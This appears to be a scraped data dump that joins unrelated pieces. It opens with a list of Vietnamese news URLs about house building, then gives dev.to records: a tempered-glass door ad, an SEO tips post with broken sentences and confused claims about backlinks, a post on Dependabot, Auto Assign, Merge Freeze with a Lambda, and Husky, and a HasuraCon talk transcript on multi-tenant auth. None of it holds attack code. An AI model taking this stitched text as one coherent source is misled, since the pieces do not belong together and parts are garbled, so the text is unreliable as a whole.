http://baolangson.vn/quoc-te/99955-i-xra-en-cong-bo-ke-hoach-xay-nha-dinh-cu-moi-gan-dong-gie-ru-xa-lem.html
http://antt.vn/dai-gia-xay-nha-san-go-lim-hon-200-ty-o-dien-bien-la-ai-2355.htm
https://baotayninh.vn/xay-nha-tuong-niem-bac-ho-tai-truong-sa-a18883.html
http://baolangson.vn/the-thao/the-thao-trong-nuoc/319523-giai-golf-tu-thien-xay-nha-tinh-nghia-va-giup-do-dong-bao-mien-trung.html
https://baodansinh.vn/ho-ngheo-xay-nha-o-duoc-ho-tro-the-nao-94364.htm
https://baodansinh.vn/khanh-hoa-trao-265-trieu-dong-ho-tro-doan-vien-xay-nha-mai-am-20191104170037671.htm
http://thanhnienviet.vn/2020/11/14/cong-lung-vi-1-phut-si-dien-muon-xay-nha-to-ra-o-rieng/
https://tieudungplus.vn/bds-24h-du-thao-nghi-dinh-quan-ly-vat-lieu-xay-dung-phai-gan-lien-voi-thuc-te-1602916282838.html
https://nguoidothi.net.vn/tranh-luan-viec-xay-nha-hat-giao-huong-o-thu-thiem-16058.html
http://thanhnienviet.vn/2020/09/12/lan-dau-tien-mot-thuong-hieu-san-xuat-vat-lieu-xay-dung-dat-set-nung-viet-nam-lap-cu-dup-ky-luc-the-gioi/
https://giaoducthoidai.vn/gia-dinh/nguoi-dan-ong-nga-xay-nha-tren-cay-cua-hang-xom-khi-ho-di-nghi-3757877.html
http://thanhhoa24h.net.vn/nguyen-chu-tich-mat-tran-to-quoc-tinh-xay-nha-trai-phep-tren-nui-a160057.html
http://baobinhduong.vn/giai-bong-chuyen-tre-cup-clb-toan-quoc-2019-tre-vat-lieu-xay-dung-binh-duong-ra-quan-an-tuong-a206782.html
http://baolangson.vn/xa-hoi/42846-ho-tro-nguoi-dan-xay-nha-luu-tru-cho-cong-nhan.html
https://baodansinh.vn/hoa-phat-bien-xi-hat-lo-cao-thanh-vat-lieu-xay-dung-bao-ve-moi-truong-83064.htm
http://baoyenbai.com.vn/12/123296/Tap_doan_Han_Quoc_xay_nha_may_angten_khong_day_tai_Ha_Nam.aspx
http://danang24h.vn/tu-15-8-xay-nha-phai-ky-cam-ket-dam-bao-an-toan-cho-hang-xom-a37138.html
http://hatinh24h.com.vn/chay-kho-vat-lieu-xay-dung-nhieu-nguoi-chay-tan-loan-a104533.html
https://baodansinh.vn/thua-thien-hue-bo-sung-gan-39-ty-dong-ho-tro-xay-nha-o-cho-nguoi-co-cong-voi-cach-mang-20200829093057066.htm
https://baoangiang.com.vn/ma-tran-thi-truong-kinh-cuong-luc-a255236.html
http://baolangson.vn/khoa-hoc-tin-hoc/228150-nghien-cuu-su-dung-tro-xi-cua-nha-may-nhiet-dien-na-duong-lam-mat-duong-giao-thong-nong-thon-thay-the-vat-lieu-xay-dung-gop-phan-bao-ve-moi-truong.html
https://giaoducthoidai.vn/ket-noi/xay-nha-ve-sinh-truong-hoc-tu-chat-lieu-gach-sinh-thai-lJV9mYUGR.html
https://baotayninh.vn/xay-nha-khong-phep-bi-lang-gieng-phan-ung-a85151.html
http://baoquangtri.vn/Xa-hoi/modid/420/ItemID/133991/title/Ho-tro-hoi-vien-phu-nu-ngheo-xay-nha-ve-sinh
http://thanhnienviet.vn/2020/10/10/roi-sai-gon-ra-da-nang-cap-vo-chong-mua-dat-xay-nha-3-tang-dep-nhu-resort/
https://reatimes.vn/ly-giai-su-tang-gia-vat-lieu-xay-dung-o-metro-manila-2753.html
https://giaoducthoidai.vn/chuyen-la/xay-nha-vuong-cay-co-thu-tram-tuoi-gia-dinh-quyet-dinh-lam-mot-viec-khien-ai-di-qua-cung-phai-nguoc-nhin-3804078.html
http://baoyenbai.com.vn/12/39196/Gia_vat_lieu_xay_dung_tang_cac_nha_thau_lao_dao.aspx
https://nguoidothi.net.vn/bac-bo-y-tuong-xay-nha-gia-re-25m2-o-tp-hcm-7590.html
https://baothuathienhue.vn/bao-thua-thien-hue-gop-suc-xay-nha-tinh-nghia-cho-ho-ngheo-o-khanh-hoa-a41376.html
http://baobinhduong.vn/xa-phu-an-thi-xa-ben-cat-khoi-cong-xay-nha-nhan-ai-a100980.html
https://reatimes.vn/phat-trien-vat-lieu-xay-dung-xanh-can-co-che-ro-rang-35549.html
https://baolongan.vn/xay-nha-bi-nghieng-mat-long-hang-xom-a69250.html
https://baolongan.vn/doan-thanh-nien-ho-tro-xay-nha-va-tang-qua-cho-nguoi-ngheo-a41668.html
https://reatimes.vn/them-sieu-thi-vat-lieu-xay-dung-tai-tp-ho-chi-minh-202327.html
https://baotayninh.vn/israel-cho-phep-chuyen-vat-lieu-xay-dung-vao-dai-gaza-a61303.html
https://reatimes.vn/can-danh-thue-cao-dat-xay-nha-o-nhung-bo-hoang-20200112143950928.html
https://baolongan.vn/de-xuat-lap-ho-thanh-cong-de-xay-nha-tai-dinh-cu-a35482.html
https://reatimes.vn/ca-thon-xay-nha-khong-so-do-vi-co-che-la-lung-459.html
https://baotuyenquang.com.vn/kinh-te/cong-nghiep-ha-tang/day-manh-phat-trien-cong-nghiep-che-bien-vat-lieu-xay-dung-co-khi-128698.html
https://reatimes.vn/vat-lieu-xay-dung-khong-nung-kho-canh-tranh-tren-thi-truong-20200515101926927.html
https://www.bienphong.com.vn/10-ngu-dan-mien-trung-co-hoan-canh-kho-khan-duoc-ho-tro-tien-xay-nha-post16069.html
https://giaoducthoidai.vn/thoi-su/chu-tich-da-nang-neu-tuong-ca-xay-nha-trai-phep-xu-khong-vuong-ban--484509.html
http://baolangson.vn/xa-hoi/34988-tra-vinh-chu-trong-cong-tac-xay-nha-o-cho-cong-nhan-va-cham-soc-nguoi-ngheo.html
http://thanhnienviet.vn/2020/09/28/nha-lech-tang-la-gi-co-nen-xay-nha-lech-tang-hay-khong/
| kinhennho |
709,021 | Các mẫu cửa kính cường lực đẹp cập nhập t6-2021 | Cửa kính cường lực mở quay, bản lề sàn Cửa kính cường lực mở quay hay còn gọi là cửa kính bản lề sàn... | 0 | 2021-05-26T10:10:12 | https://dev.to/kinhennho/cac-m-u-c-a-kinh-c-ng-l-c-d-p-c-p-nh-p-t6-2021-3ci3 | cuakinhcuongluc |
Cửa kính cường lực mở quay, bản lề sàn
Cửa kính cường lực mở quay hay còn gọi là cửa kính bản lề sàn hoặc cửa kính thuỷ lực. Do lắp bằng kính cường lực nên cửa có độ bền cao, ít hư hỏng, nên cửa được sử dụng nhiều nhất hiện nay trên thị trường.
Cửa có 2 loại chính là cửa 1 cánh hoặc 2 cánh, sử dụng bản lề sàn VVP Thái Lan hoặc các loại cao cấp khác như Adler ( Đức – hàng chính hãng, bảo hành lên tới 24 tháng, có check code SMS), hay phụ kiện Huy Hoàng do Việt Nam sản xuất ( Bảo hành chính hãng lên tới 24 tháng), hoặc bản lề cao cấp nhập khẩu Hafele.
Cửa kính cường lực bản lề sàn sử dụng đế sập nhôm để lắp đặt là loại phổ biến nhất Cũng có thể sử dụng một số loại khung khác như:
Cửa kính cường lực khung sắt : Sử dụng sắt hộp 40×80, sơn phun màu, tạo sự chắc chắn, đảm bảo.
Cửa kính cường lực khung nhôm: Sử dụng nhôm hệ 4500 Việt Pháp hoặc nhôm hệ Xingfa, đảm bảo tính thẩm mỹ cao và an toàn hơn
Cửa kính cường lực lùa, trượt
Cửa lùa trượt treo giúp khắc phục được một số hạn chế về diện tích của cửa mở quay đòi hỏi cần có không gian mở.
Cửa kính lùa, trượt có 3 loại chính là D25, lùa inox 10×30 ( thường lắp cabin), lùa ray nhôm, và hệ Jamilldoor.
Cửa lùa D25 là loại thông dụng hay được sử dụng nhất do chất lượng ổn định và giá thành tốt, cửa hệ Jamilldoor là loại bền bỉ nhất, chắc chắn nhất kén người sử dụng do giá thành tương đối cao.
Cửa kính cường lực giá bao nhiêu tiền 1m2 ? Cửa kính cường lực giá bao nhiêu?
Giá cửa kính thuỷ lực, cường lực giá hiện nay giá dao động chỉ từ 430,000 đ, đến 530,000 đối với kính cường lực 10mm và 12mm.
Giá cửa kính cường lực = Giá m2 kính cường lực + giá phụ kiện cửa kính cường lực
Nguồn: https://kinhennho.com/cua-kinh-cuong-luc/ | kinhennho |
709,056 | 6 Amazing Tips To Boost Your SEO | While there is a lot of SEO advice and tips out there, most don’t deliver desirable results. And some... | 0 | 2021-05-26T10:56:59 | https://dev.to/raymondhalliwell/6-amazing-tips-to-boost-your-seo-38ee | digitalmarketing, raymondhalliwell, seo, socialmediamarketing | While there is a lot of SEO advice and tips out there, most don’t deliver desirable results. And some are already outdated and seem to work no more with Google’s constant change in algorithm. With an abundance of tips and tricks flooding the internet, choosing the right one can be challenging. That is why [Raymond Halliwell](https://twitter.com/raymondhalliwel), a digital marketing expert on actionable SEO tips that have proven to improve organic rankings without getting penalized. It’s time to let go of those that aren’t working and embrace the real deal that will Improve your search rankings.
##Add relevant subtopics to existing contents##
It is not okay to miss essential points during the first draft that could have improved your page rank in search engines. Keywords might be less ranked due to missing subtopics which might lead to less visibility for your site. Rank the subtopics and include major keywords to improve ranking.
##Add backlinks from one page on your site to another##
Backlinks are interlinked that are added to new pages. These are links from a page on one website to another to give easy navigation to visitors. To increase your site ranking, add more interlinks to the pages. Search for relevant opportunities with high authorities and interlink them on your page. You can do this by searching for the website URL with the keyword you are looking for. If there are many keywords, filter them and prioritize the ones with the highest authority over the others.
##Check for competing Backlinks that undermine and decrease the performance of your content##
There is room for improvement if your keyword is not yet ranked as number one. Check for the ranking first with a SERP checker. Competing Backlinks can be a result of other pages having a lot of referring domains that pushed the ranking of your site back. Look for areas where your page beats others and use the contents. That is, go to pages with less view, reach out to them, direct and link them to your page to improve traffic and visibility.
##Revamp your blog posts as video content##
As individuals, we are different and we have different preferences. This is also applicable to content we view on the internet. Different people prefer different content formats for their business websites. Hence you should find out which format your audience prefers and tailor your content format according to your target audience’s needs. Most people prefer video formats. Therefore, you can change your blog post to videos or embed videos related to topics or keywords that most people search for on YouTube on your blog posts to reach a wider audience. This will level up your ranking on the Google search engine.
##Check and fix pages that have broken backlinks##
Backlinks that lead to dead pages are not useful according to SEO. They no longer exist nor do they help other active pages in their ranking. To know a broken backlink, filter for error 404 pages in a Link report, and if pages with referring domains exist, then the backlinks are broken.
Broken backlinks can be fixed by:
1. Reinstating dead pages deleted by mistake.
2. Redirecting a URL of dead pages to new URLs or redirect nonexistent dead pages with a similar page to the old URL.
3. Requesting for a link change. Only fix dead pages with high-quality backlinks or leave them at 404. To check if a page backlink is of good quality, go to the backlinks report.
##Convert custom-made infographics, illustrations, images, etc into backlinks##
Others might make use of these images in their contents and link back to the image source instead of the main page (source link). To check if people are using your image without proper linking, go to any image on your website, right-click then click on “Search Google” for Image options available on the menu. You can also copy and paste the link to your website on Site Explore. For this, click on Backlinks report, look for links that have .jpg, or .PNG, in the URLs of the backlinks and you will see the sites that have inappropriately linked their contents to your images.
###Conclusion###
We hope these tips given by Raymond Halliwell can be of help in your SEO journey. The good thing is it doesn’t take time and it can be implemented in a few hours. With these, watch your website pages rank high in no time.
_Originally published at [getjoys.net](https://getjoys.net/technology/tips-to-boost-seo/)_ | raymondhalliwell |
710,330 | 5 tools to automate your development | Automating your development with Dependabot, Auto Assign, Merge Freeze, Husky and Scheduled... | 0 | 2021-08-27T12:43:48 | https://dev.to/pgarzina/5-tools-to-automate-your-development-3m | productivity, github, devops | Automating your development with Dependabot, Auto Assign, Merge Freeze, Husky and Scheduled reminders.
The idea of this post is to introduce some of the tools and integrations that made our development life easier.
Most of these are pretty straightforward to implement into your workflow but for the ones that have a couple of gotchas I might write an extended introductory version for that tool alone.
## 1. Dependabot
### *Automated dependency updates*
*Dependabot creates pull requests to keep your dependencies secure and up-to-date.*
[Dependabot](https://dependabot.com/) is dead simple and their punchline clearly states what it does. We started using it a couple of years back, a bit before [Github acquired it](https://dependabot.com/blog/hello-github/).
The main reason was that, at the time our current team took over the Front End division, there were a lot of outdated dependencies which we wanted to update and wanted to keep up to date. We found Dependabot, added it to our projects, and let it do its magic ever since.
Now it's natively a part of Github, so adding it is even easier than before. You can [check out](https://docs.github.com/en/code-security/supply-chain-security/keeping-your-dependencies-updated-automatically) how to set up Dependabot, but in the end you'll end up with a `dependabot.yml` in your `.github` folder.
Ours looks like this:
``` yml
version: 2
updates:
- package-ecosystem: "npm" # See documentation for possible values
directory: "/" # Location of package manifests
schedule:
interval: "daily"
open-pull-requests-limit: 2
commit-message:
prefix: "BleedingEdge"
```
The only thing that differs from the default settings is that we:
- chose npm as our package-ecosystem
- limited the number of open PRs to 2
- added a prefix for the default Dependabots commit message (you'll see later why)
Four years back we had 3 frontend repos, now we have around 14 active ones. Manually keeping every dependency up to date would be extremely time consuming. Dependabot helps a lot, but it still takes time to review and merge all the PR's. We usually take a day, after our weekly release, to merge Dependabots pull requests.
*Writing this got me wondering if we could set the bot to open PR's only on major, minor or patch versions and indeed the feature [was requested in 2018](https://github.com/dependabot/dependabot-core/issues/2219) and got released a few months ago and now you can ignore SemVer updates of your choice. Check out [GitHub's blog post](https://github.blog/changelog/2021-05-21-dependabot-version-updates-can-now-ignore-major-minor-patch-releases/) for more.*
## 2. Auto Assign
### *Add reviewers/assignees to pull requests when pull requests are opened.*
So you opened a pull request, you need at least two approvals and you need to add reviewers to your pull request. Every single time.
Things are pretty obvious, let the bot do it.
Setting up is easy, go to [probot.github.io/apps/auto-assign](https://probot.github.io/apps/auto-assign/) hit the Add to Github button and don't ever worry about manually adding reviewers!
Similar to Dependabot, you will end up with a `auto_assing.yml` file:
```yml
# Set to true to add reviewers to pull requests
addReviewers: true
# Set to true to add assignees to pull requests
addAssignees: false
# A list of reviewers to be added to pull requests (GitHub user name)
reviewers:
- teammember1
- teammember2
- teammember3
- ...
# A number of reviewers added to the pull request
# Set 0 to add all the reviewers (default: 0)
numberOfReviewers: 0
# A list of keywords to be skipped the process that add reviewers if pull requests include it
skipKeywords:
- BleedingEdge
```
We have nothing out of the ordinary here. We are utilizing the *skipKeywords* option with the *BleedingEdge* keyword that if you remember Dependabot prefixes to each of its pull requests. We handle the pull requests Dependabot opens a little bit differently and don't want to burden all the reviewers with them.
Once the Pull request is opened the bot kicks in and you see it in the timeline requesting reviews:

*You can also try and use the default settings Github provides for Code Review Assignments. Just go to your team page, in the top right hit Settings and you'll find the Code review assignments tab. We tried it but it didn't work out for us.*
## 3. Merge Freeze
### *The code freeze tool to block merging and deployments*
The reason for adding merge freeze originated from a simple question:
> *Can you tell all the developers to stop merging since we are starting regression?*
We could announce it in our team's channel in hopes that everyone reads the message in time. Or we could integrate a tool that allows the QA team to issue a command on Slack that freezes/unfreezes merging to the repository. [Merge Freeze](https://www.mergefreeze.com/) to the rescue.
Again, setting up, nothing too complex. What we did find Merge Freeze is missing is the ability to bulk freeze. It worked well when we needed to freeze a couple of repos. But once the number of our repositories increased to over 10, manually entering the command more than 10 times... you get it.
For this we used [Slack Apps](https://slack.com/apps) and [AWS Lambda](https://aws.amazon.com/lambda/).
We created a custom Slack App for our workspace called Deployment, that has two Slash commands: `/freeze_all` and `/unfreeze_all`. Both commands have the Request URL set to our Lambda url, and pass the freeze value as a query parameter: `?freeze=true | false`.
Using it on Slack looks like this:

The Merge Freeze tool exposes an API endpoint for each repository you add to it, which you can use to freeze or unfreeze it. That makes the Lambda rather simple, it just makes a POST request to each of the endpoints provided by MergeFreeze.
```javascript
const https = require('https');
exports.handler = async (event) => {
const freezeValue = getFreezeValue(event);
if (!freezeValue) {
return {
statusCode: 400,
body: JSON.stringify('BOOM! You need to provide a freeze value as a query param, either true or false'),
};
}
const userName = getUserName(event)
const baseOptions = {
hostname: 'mergefreeze.com',
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Content-Length': 0,
},
};
const appOneOptions = {
path: `/api/branches/your-organization/your-repo/main/?access_token=${process.env.ACCESS_TOKEN}&frozen=${freezeValue}&user_name=${userName}`,
...baseOptions,
};
...
/** Removed the rest of declaration to keep the preview short */
await Promise.all([
doRequest(appOneOptions),
...
doRequest(appElevenOptions),
]);
console.log("I'm done with all your promises!");
// Text that gets return to Slack that is only visible to the person entering the command
return {
statusCode: 200,
body: JSON.stringify('You have such power!!!'),
};
function doRequest(options) {
return new Promise((resolve, reject) => {
const req = https.request(options, (res) => {
res.setEncoding('utf8');
let responseBody = '';
res.on('data', (chunk) => responseBody += chunk);
res.on('end', () => resolve(responseBody));
});
req.on('error', (err) => reject(err));
req.end();
});
}
function getFreezeValue(event) {
let freezeQueryString;
let freeze;
if (event && event.queryStringParameters && event.queryStringParameters.freeze) {
freezeQueryString = event.queryStringParameters.freeze;
}
if (freezeQueryString === 'true' || freezeQueryString === 'false') {
freeze = freezeQueryString;
}
return freeze;
}
function getUserName(event) {
const bodyQueryParams = new URLSearchParams(event.body);
return bodyQueryParams.get('user_name') || 'Web API';
}
};
```
After entering the command, MergeFreeze lists all the repos that got frozen or unfrozen and you get a confirmation message from Slack, making your work day a bit better!

After the regression is done, everything is pushed to Production and is smoke tested, the lead QA issues the `unfreeze_all` command and life goes on.
## 4. Husky
### *Modern native Git hooks made easy*
We use Jira as our work management tool so we have to prepend the ticket ID to our branch names and commit messages in order to utilize both the Development panel when viewing an issue and VSCodes extension GitLens:
Jira ticket Development panel:

This means that each time you create a branch you have to remember to include the Jira issue ID, eg: task-**ND-123**-add-authentication. That alone was not a big deal as it quickly became a habit. But what was a PIA was prepending it to every commit message. The 1st automation round was just setting up the git `prepare-commit-message` hook on your local machine, but as the team grew larger we needed a better solution which Husky provided!
[Husky](https://typicode.github.io/husky) in combination with [jira-prepare-commit-msg](https://github.com/bk201-/jira-prepare-commit-msg) is what worked for us:
```json
...
"private": true,
"husky": {
"hooks": {
"prepare-commit-msg": "jira-prepare-commit-msg"
}
},
"jira-prepare-commit-msg": {
"messagePattern": "$J $M",
"jiraTicketPattern": "(\\w+-\\w+-\\d+)"
},
"dependencies": {
...
"devDependencies": {
"husky": "^4.3.8",
"jira-prepare-commit-msg": "^1.5.2",
...
```
The JIRA ticket ID is taken from a git branch name. Now you could just write `commit -m "Fixing a typo"` and you would get a commit message looking like *task-ND-123-Fixing a typo*.
In case you did not name your branch correctly eg: missing Jira ticket ID you would get an error:
``` bash
my-application git:(main) ✗ git commit -m "Add authentication methods"
husky > prepare-commit-msg (node v14.15.0)
JIRA prepare commit msg > start
JIRA prepare commit msg > Error: The JIRA ticket ID not found
JIRA prepare commit msg > done
```
This came in nicely as everything was set up in `package.json` and a new developer would do `npm i` and she/he is pretty much set, no need to manually configure hooks.
But the Jira Ticket ID in the commit message in combination with GitLens is what really made this super useful.
GitLens with Git blame annotations:

There were a lot of times where we had to, for various reasons, open up and read the Jira issue associated with the code change. Having the ticket ID at each mouse click throughout the codebase saved us a lot of time. (opening it in the browser is easy as well, just take the Jira ID and add it after *.../browse/* + *ND-123* e.g., https://your-organization.atlassian.net/browse/ND-123)
GitLens is a cool tool which I personally use on a daily basis. It helps you to visualize code authorship at a glance via Git blame annotations and code lens. You can also very easily navigate back in history to see past commits which is useful as well.
## 5. Scheduled reminders for Pull Requests
### *Scheduled reminders help teams focus on the most important review requests*
This is something we added not too long ago, just a bit after we moved to Micro Frontend Architecture. One of the reasons for adding it was that the number of repositories increased from 4 to 14 so having a dedicated channel for open pull requests made sense. Prior to this we would post a link of the PR in our team's main channel, or would hope people would see it in their email. This way we moved the noise to a dedicated channel, and the devs know the team will get automatically notified.

We get notifications on every working day each full hour from 8-16. It ignores approved pull requests (in our case when 2+ ppl approved it) and we also have ignore terms for *BleedingEdge* so it ignores pull requests opened by Dependabot.
Setting up [scheduled reminders](https://docs.github.com/en/organizations/organizing-members-into-teams/managing-scheduled-reminders-for-your-team) is straightforward and you can find the github docs [here](https://docs.github.com/en/github/setting-up-and-managing-your-github-user-account/managing-your-membership-in-organizations/managing-your-scheduled-reminders). This is how it looks like once its up, in our case it posts messages in a private *frontend-pull-requests* channel:

...
There are a lot of improvements that we could include on top of what we have, like creating branches directly from Jira would ease up on having to remember the naming convention. Or maybe we could have chosen a merge freeze tool that has bulk freeze built in. But usually we had limited time for investigation, or it was good enough at that time, and later on we just tried to improve the process instead of replacing the tool.
If you have any suggestions, please do post them in the discussion below!
***
Feel free to connect 👋
[Twitter](https://twitter.com/pgarzina) | [Instagram](https://www.instagram.com/pgarzina/) | [LinkedIn](https://www.linkedin.com/in/petar-garzina/)
| pgarzina |
709,338 | Architecture & Authorization For A Complex Multi-Tenant SaaS Platform With Hasura | Prefect | by Zachary Hughes @HasuraCon'20 | Zachary Hughes spoke last year at HasuraCon'20 on how Prefect's complex multi-tenant architecture a... | 0 | 2021-05-27T08:50:21 | https://hasura.io/blog/architecture-authorization-multi-tenant-saas-platform-with-hasura-prefect/ | hasuracon | ---
title: Architecture & Authorization For A Complex Multi-Tenant SaaS Platform With Hasura | Prefect | by Zachary Hughes @HasuraCon'20
published: true
date: 2021-05-26 13:36:24 UTC
tags: HasuraCon
canonical_url: https://hasura.io/blog/architecture-authorization-multi-tenant-saas-platform-with-hasura-prefect/
---

_[Zachary Hughes](https://github.com/zdhughes) spoke last year at HasuraCon'20 on how Prefect's complex multi-tenant architecture and authorization is built with Hasura._
_As HasuraCon'21 is almost here, we thought it would be the perfect time to take a look back on all the amazing talks by our amazing speakers from 2020!_
_[You can sign up for HasuraCon'21 here!](https://hasura.io/events/hasura-con-2021/)_
_Here's Zachary's talk in video form:_
{% youtube jWFsMI5ffGM %}<figcaption>Architecture & Authorization For A Complex Multi-Tenant SaaS Platform With Hasura | Prefect by Zachary Hughes @HasuraCon'20</figcaption>
_And below is a text transcription of the talk for those who prefer reading! (The text is slightly paraphrased and edited here and there for clarity's sake.)_
**TRANSCRIPTION:**
Hey folks, thanks for coming. Today we're going to talk a little bit about architecture and authorization modeling for a complex multi-tenant SaaS platform. And why using Hasura to achieve this is a Hasura-fire way.
**A bit about me**
So for those of you who didn't hit “leave meeting” as soon as you heard that awful pun, let's get some introductions out of the way. My name is Zachary Hughes. I'm based in Washington DC, and I'm a cloud engineer at a company called Prefect. Here's a little bit of contact information about myself. And in case you want to reach me.
**The Agenda for today**
What are we going to be talking about today? We're going to start by talking a little bit about Prefect. I know it's HasuraCon and not PrefectCon, but context is helpful to understanding what Prefect is trying to do helps explain why we do what we do with Hasura. Once we've gotten that out of the way, we'll talk a little bit about the architecture and how Hasura fits in with Prefect's overall design.
Following that, we'll talk a little bit about using Hasura, both internally and externally. So when people hit our API versus how we develop with it, and at once that foundation is set, we'll talk a little bit about Auth, that's gonna include roles, multi-tenancy, permissions, all that good stuff.
**About Prefect**
A little bit about Prefect, let's dive in.
At a really high-level Prefect is just responsible for making sure that workflow is executed properly. For any of y'all in the audience who might be fans of Hitchhiker's Guide to the Galaxy, the name is 100% inspired by that wonderful roving researcher Ford Prefect. It's a little bit of an homage.
**Prefect Core**
Prefect at the moment has two main components: Prefect Core, which is workflow management, that takes your code and transforms it into a robust distributed pipeline that we call flow, and Prefect Cloud, which is the layer of abstraction and orchestration on top of that.
This is an API as well as a UI that provides additional orchestration, observability, and auth and IAM data pipeline. Basically, all that stuff that you don't really have to worry about. We call that stuff negative engineering.
**Prefect Cloud**
Diving a little bit more deeply in Prefect Cloud, as we mentioned, it's a UI and an API that lets us manage scheduling your flows, which are those pipelines we discussed, helps you monitor and maintain the health of flows, and persist information about flow execution history.
This includes logs and flow states and flow states are basically just indicators of the history of the flow: when it started running, whether it failed or succeeded, any sort of information like that. And the great thing is, a significant portion of that is covered by Hasura.
**Prefect's Architecture**
Given that, let's talk a little bit about the architecture and how sort of fits into it.

Here's a high-level diagram of Prefect's architecture, it's a little bit pared down, but I don't want to bore you with the details. As you can see most of our compute is located in a GKE cluster. So let's start with the beginning.
We have an inbound request with the JWT in Header. That seems a little bit specific, but it's going to be important for our auth. Once the request hits upon the server, the Apollo server then talks to our auth service, verifies the token, it populates a role in a new JWT.
Once that new JWT has reached the Apollo server, it can take one of two paths. If the inbound request was in a query, you send it directly to Hasura. Or if it's a mutation, it takes a little bit of a detour. This detour takes it to Python business logic. It's bundled with an ORM. We'll get into the details of that a little bit later.
But the important part to consider right now is that once everything is said and done, this middleware posts any request to Hasura, and then everything ends up in Cloud SQL on the back end.
**JWT Contents**
Now digging a bit more into JWTs that we discussed earlier, it's important to consider that there are two pieces or three pieces of content that are really important here.
We have a user ID, which indicates a specific user associated with this token, we have a tenant ID, which indicates the team this token belongs to. And we have a role, which indicates the user's role in Hasura.
**Example, before & after auth service**

So interestingly enough, when we first get our token, it doesn't have a role, we dynamically populate that. So if you notice, in this example, we have a tenant ID and a user ID, which we would expect, but we don't have a role.

However, once the Apollo server gets that auth that it does have a role. Seems like sort of a detail, but it's going to be important as far as how we manage dynamic roles.
**Using Hasura**
Let's move on to how we actually use Hasura.
Consuming the Prefect API is pretty easy, and really anytime we consume the Prefect API, we consume the Hasura API. So as we discussed earlier, queries were sent directly to Hasura after the JWT is auth'd. Mutations take that detour that we discussed which goes to the Python business logic we've defined. And then any interaction between that business logic and Hasura is done via the ORM.
As far as humans go, everything is consolidated in a column, so the user has a seamless experience. Everyone just hits API.prefect.io and they're good to go. And then is half mean-half serious: and the, you know, I have tried each of these three approaches, they're each as painful as they sound. And we're getting a little bit more into the detail. But it's been really delightful letting Hasura handle all of this stuff.
**The ORM**
Speaking of the ORM, let's give it a little bit of attention, because it is super nice, and it helps improve the productivity of our internal dev experience. The ORM is just a lightweight layer in front of Hasura. It's implemented in Python, the actual serialization logic there's identic, and it lets us interact with Hasura in a convenient manner.
Rather than having to open up the session, post everything, every time you want to talk to Hasura, we just use our ORM. Another nice thing about this is that the ORM operates within a token context that's populated by the JWT we've been discussing. This sounds like another implementation detail, but it's actually really nice because by using the ORM in conjunction with the token context, it means that every time we send something to Hasura using the ORM, we have pre-populated tenant IDs and user IDs for the roles and the header. This lets us sort of delegate our permissions work to Hasura without having to handle anything else on the front end.
Moving over, here are just some samples of what this actual ORM looks like. Our query would look fairly simple and lightweight: models.Flow.where we define our WHERE clause. Let's say something like name is equal to fool, and then we just get it. Similarly, if you wanted to insert something, we'd say models.Flow, define our actual flow, name through here are the tasks inside the flow, yada, yada. And then we'd go ahead and insert it.
**Auth**
So with that foundation layer, let's talk a little bit about auth.
Our auth model has three main components. We have users, who represent individual consumers and cloud - sounds a little bit silly to define that. But we also have a user role. We have memberships, which link a user's role to a team. And then we have teams, which are effectively tenants, many groups of people working with the same flows, have access to the same resources, like flows, projects, all that good stuff.
Users and tenants both have unique IDs, we use UUIDs. And these IDs are used to enforce role-based permissions. They both make liberal use of Hasura relationships. This is partially in order to just help improve the querying experience. It's also partially to help improve data integrity. And it's worth noting that users and tenants are many to many of us model, users can belong to one or more team tenant and switch it as well. And tenants can have one or more user.
**Examples**

So with that out of the way, I know it's a lot of text, let's take a little bit of a look at an example. Let's check out our flow.tenant ID. Our flow table has a certain ID column, which maps to the ID column or a tenant. This helps us enforce our row permissions, which are here where we check to make sure that our tenant ID is equal to the X-Hasura-tenant ID. That x-Hasura-tenant ID is part of what's passed through by our ORM or populated directly if it was passed through by a query.
**Roles**
So roles, these are important. Users have access to four primary roles.
We have a login role, which is sort of invisible, allows users to view information necessary to find and select their membership. Once they've found and selected their membership, we have three remaining roles.
We have a read-only user, just sort of what it says on the tin. It allows the user to view everything in a given tenant, but not update or insert anything. It's sort of an observer/auditor-type role.
We have users who are sort of day-to-day folks using the system. This gives the user everything they need to do in order to operate in that tenant. That means they can view things, they can kick off and create flows, create projects, update states, whatever you'd like.
And then we have kind of admins who give the user the ability to actively manage everything in that tenant. This includes things like billing. It also includes managing things like who actually belongs to a tenant. If you have a bad actor, then admins have the ability to remove them.
We also have a fifth role called runner, which is less crucial to how users actually interact with the system, but it's important for our orchestration, we're just gonna leave that off for the time being.
**Roles Example**

As an example, let's take a look at this. You can see right off the bat that our permissions are actually fairly granular, and they're not an all standard. Certain things have permissions for everything. Certain things have no permissions.

This is our membership table. So let's see who can do what. A user has permission to delete a membership that matches their user ID. This makes a fair amount of sense, right, because a user should be able to remove themselves from a tenant if they would like. But they shouldn't be able to actually remove someone else.
On the other hand, a tenant admin who is responsible for managing the tenant as a whole has permission to remove any membership that matches their tenant ID, which gives them a bit more power. This is a really nice, clean illustration of how you can actually give tenant and user permissions, and use roles in conjunction with them to help that intersection be a little bit more manageable.
**Switching** **Tenants**
So with all this in mind, switching tenants is actually super easy. And a key part of what we do as far as multi-tenancy goes. With this pattern in place that we've discussed, switching tenants is just as easy as issuing a new JWT. You issue a new JWT, that populates the new context, which defines the user ID, the tenant ID, and the role. And then once that's all said and done, you can move on to another tenant.
**No need to write custom permissions & auth with Hasura**
So something I want to call out here is using roles and role-based permissions lets us delegate permissions in Hasura which sounds sort of obvious, but it's something I know I take for granted since I've been working with Hasura for long enough. I've written custom permissions before as well as custom auth, and it is so painful. I would officially like to never write one again. I am sure there are folks out there who are great at it. And I'm sure there are folks out there who might even enjoy it. It's not really where I'd like to focus my attention.
**Views can help us**
But there is one gotcha. What if you want to allow folks with the user role to view other users in their tenant. It's a little bit tricky. In this case, the pattern we've approached with is views. So we can define a view and map memberships and roles and permissions do them, the same way we would any other table. So by defining views alongside your tables, you can define an entirely separate set of permissions to fit your needs. In this case, we want users to be able to see email, first, last name of other users, but no more. And by using views and defining a separate set of permissions there, it allows us to take the union of what they can do.
**Parting Thoughts**
So I'd like to leave with a couple of parting thoughts. The big thing is between its GraphQL capabilities and flexible permission schema, Hasura roughly halves the amount of time it would take us to add and expose a data model. I cannot say just how nice it is to be able to implement a feature, create our new model, define how users will query for it, and have that be the easiest part of our system. We basically define our permissions, we make sure that our tenant guards are in place, and we're good to go.
**Thanks!**
